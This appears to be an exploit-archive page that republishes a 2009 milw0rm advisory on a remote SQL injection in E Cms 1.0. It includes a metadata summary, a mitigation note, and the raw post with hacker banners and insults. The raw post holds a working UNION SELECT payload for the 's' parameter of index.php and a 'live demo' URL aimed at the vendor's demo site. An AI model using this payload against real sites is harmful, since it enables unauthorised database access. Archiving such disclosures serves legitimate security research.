header-logo
Suggest Exploit
vendor:
E Cms
by:
Red-D3v1L
9
CVSS
HIGH
SQL Injection
89
CWE
Product Name: E Cms
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: YES
Related CWE: N/A
CPE: a:enterbt:e_cms
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

E Cms <= 1.0 Remote SQL Injection Vulnerability

E Cms version 1.0 is vulnerable to a remote SQL injection vulnerability. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable application. This can allow the attacker to gain access to the database and execute arbitrary SQL commands.

Mitigation:

The vendor has released a patch to address this vulnerability. Users are advised to upgrade to the latest version of the application.
Source

Exploit-DB raw data:

==============================================================================
                         ##  Hackteach.OrG ##
             
                      zZzZzZz                 zZzZzZz
                          Zz     ooooo            Zz    
                         Zz      o   o           Zz  
                        Zz       o   o          Zz 
                       Zz        o   o         Zz    
                      Zz         ooooo        Zz 
                     zZzZzZz                 zZzZzZz     
       
==============================================================================
        [»] ~ Note : Hacker R0x Lamerz Sux !
==============================================================================
        [»]  E Cms <= 1.0 Remote SQL Injection Vulnerability
==============================================================================
    [»] my home:            [ Hackteach.org ]
    [»] Script:               [ E Cms 1.0]
    [»] Language:           [ PHP ]
    [»] Home:               [ http://cmsdemo.enterbt.hu ]
    [»] Founder:            [ Red-D3v1L < php-c0de@hotmail.com > ]
    [»] Gr44tz to:          [ All member Hackteach.org/cc And Str0ke :$ ]
    [»] Fuck To :           [ Anti-trust << Big Big Big Lamer << ]
#########################################################################
 
===[ Exploit SQL ]===  
    [»] Path/index.php?s=-10+union+select+version()--
    [»] L1v3 d3m0 : http://cmsdemo.enterbt.hu/html/index.php?s=-10+union+select+version()--

Author: Red-D3v1L <-

###########################################################################

# milw0rm.com [2009-08-18]

Navigation

Suggest Exploit

Services By CQR